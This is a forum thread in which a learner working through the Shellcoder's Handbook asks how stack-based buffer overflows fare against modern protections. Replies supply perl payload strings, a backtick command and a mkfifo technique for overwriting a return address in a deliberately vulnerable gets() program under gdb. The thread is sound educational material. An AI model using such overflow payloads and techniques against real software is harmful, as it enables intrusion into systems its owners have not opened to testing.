Advertisement
If you have a new account but are having problems posting or verifying your account, please email us on hello@boards.ie for help. Thanks :)
Hello all! Please ensure that you are posting a new thread or question in the appropriate forum. The Feedback forum is overwhelmed with questions that are having to be moved elsewhere. If you need help to verify your account contact hello@boards.ie
Hi there,
There is an issue with role permissions that is being worked on at the moment.
If you are having trouble with access or permissions on regional forums please post here to get access: https://www.boards.ie/discussion/2058365403/you-do-not-have-permission-for-that#latest

Questions on buffer overflows

  • 10-01-2012 8:54pm
    #1
    Registered Users, Registered Users 2 Posts: 208 ✭✭


    1. After reading up on buffer overflows and testing examples from the shellcoders handbook it seems that there are alot of obstacles to buffer overflows these days. To run an example in chapter two I had to compile the example with the flag -fno-stack-protector to disable the stack-protector. I have also read about stack randomization with ASLR, and non executable stacks....

    This is all on linux but I presume windows has similar stack protection measures. With that in mind, is there any point in stack based buffer overflows these days if there is so much protection on the stack?

    Other tutorials Ive read also mention stuff like disabling stack protection and using execstack to make the stack executable so as to run examples...well what good is that in the real world when you obviously are not going to be able to control the system you are running the shellcode against? So are stack based buffer overflows 'any good' these days?

    2. In one of the first examples in chapter 2 of the shellcoders handbook it gives this code -
    #include <stdio.h>
    #include <string.h>
    
    void return_input(void)
    {
        char array[30];
        
        gets (array);
        printf("%s\n", array);
    }
    
    
    int main()
    {
        return_input();
        
        return 0;
    }
    

    It then explains how to overwrite the ret address in the stack with the address of the call to return_input. In my case the address to use is 0x08048405

    Now it says that this address does not translate cleanly into normal ASCII characters so it says to use printf and pipe the output to the program like this -

    printf "AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD\x05\x84\x04\x08" | ./overflow

    Which is all well and good. But I want to see the ret address being overwritten with gdb - I want to run the program in gdb and enter this string and then use a breakpoint after this has been entered to view the stack and see that the ret address has been overwritten with the address Ive put in the string.

    "AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD\x05\x84\x04\x08" doesnt work if I enter it in gdb. It leads to 0x3530785c (\x50) being written into ret's location instead of 0x08048405.

    So is there a way to input this address 0x08048405 if I run the program with gdb?


Comments

  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    httpete wrote: »
    1. After reading up on buffer overflows and testing examples from the shellcoders handbook it seems that there are alot of obstacles to buffer overflows these days. To run an example in chapter two I had to compile the example with the flag -fno-stack-protector to disable the stack-protector. I have also read about stack randomization with ASLR, and non executable stacks....

    This is all on linux but I presume windows has similar stack protection measures. With that in mind, is there any point in stack based buffer overflows these days if there is so much protection on the stack?

    Other tutorials Ive read also mention stuff like disabling stack protection and using execstack to make the stack executable so as to run examples...well what good is that in the real world when you obviously are not going to be able to control the system you are running the shellcode against? So are stack based buffer overflows 'any good' these days?

    Its still possible to exploit in some cases, its just alot more difficult. Take a look at the exploit section on the articles page here:
    https://www.corelan.be/index.php/articles/

    Windows has DEP (Data Execution Prevention) and also ASLR as well as some others.

    Both OS's can use other tricks also to try prevent overflow exploits also.
    httpete wrote: »
    "AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD\x05\x84\x04\x08" doesnt work if I enter it in gdb. It leads to 0x3530785c (\x50) being written into ret's location instead of 0x08048405.

    So is there a way to input this address 0x08048405 if I run the program with gdb?

    Your backslash is not escapped, its been passed in as a literal string. Try this:
    open your binary with gdb
    # gdb -q vulnerable-app

    set your breakpoints and do

    run `perl -e 'print "AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD\x05\x84\x04\x08"`

    ` is a backtick. Perl will escape \x and treat your bytes as bytes rather than ascii.


  • Registered Users, Registered Users 2 Posts: 208 ✭✭httpete


    Its still possible to exploit in some cases, its just alot more difficult. Take a look at the exploit section on the articles page here:
    https://www.corelan.be/index.php/articles/

    Windows has DEP (Data Execution Prevention) and also ASLR as well as some others.

    Both OS's can use other tricks also to try prevent overflow exploits also.



    Your backslash is not escapped, its been passed in as a literal string. Try this:
    open your binary with gdb
    # gdb -q vulnerable-app

    set your breakpoints and do

    run `perl -e 'print "AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD\x05\x84\x04\x08"`

    ` is a backtick. Perl will escape \x and treat your bytes as bytes rather than ascii.

    OK I set break points and copied and pasted your code directly and it says -
    /bin/bash: command substitution: line 0: unexpected EOF while looking for matching `''
    /bin/bash: command substitution: line 1: syntax error: unexpected end of file
    

    Is there supposed to be a closing apostrophe for the 'print ?


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    httpete wrote: »
    OK I set break points and copied and pasted your code directly and it says -
    /bin/bash: command substitution: line 0: unexpected EOF while looking for matching `''
    /bin/bash: command substitution: line 1: syntax error: unexpected end of file
    

    Is there supposed to be a closing apostrophe for the 'print ?

    There would need to be yeah. I typed this out, I haven't ran it in a shell here.

    Try:

    run `perl -e 'print "AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD\x05\x84\x04\x08"'`


  • Registered Users, Registered Users 2 Posts: 208 ✭✭httpete


    There would need to be yeah. I typed this out, I haven't ran it in a shell here.

    Try:

    run `perl -e 'print "AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD\x05\x84\x04\x08"'`

    Right I set the breakpoints and ran the program. Then when it asks for input I copy pasted `perl -e 'print "AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD\x05\x84\x04\x08"'`

    But that just puts the hex version of that string on the stack. And my ret address is overwritten with 0x43424242 (CBBB).


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    httpete wrote: »
    Right I set the breakpoints and ran the program. Then when it asks for input I copy pasted `perl -e 'print "AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD\x05\x84\x04\x08"'`

    But that just puts the hex version of that string on the stack. And my ret address is overwritten with 0x43424242 (CBBB).

    Opps my mistake, I didn't go through the code. It reads from stdin rather than an argument. I gave you an example for an argument. To pass in something from stdin, you can do something like:

    root@bt:~/tmp# mkfifo blah
    root@bt:~/tmp# perl -e 'print "AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD\x05\x84\x04\x08"' > blah &
    [1] 5903
    root@bt:~/tmp#
    root@bt:~/tmp# gdb -q test
    Reading symbols from /root/tmp/test...(no debugging symbols found)...done.
    (gdb) run < blah
    Starting program: /root/tmp/test < blah
    AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD�

    Program received signal SIGSEGV, Segmentation fault.
    0x08049ff4 in _GLOBAL_OFFSET_TABLE_ ()
    (gdb)


  • Advertisement
  • Registered Users, Registered Users 2 Posts: 208 ✭✭httpete


    Very nice, cheers mate :)


Advertisement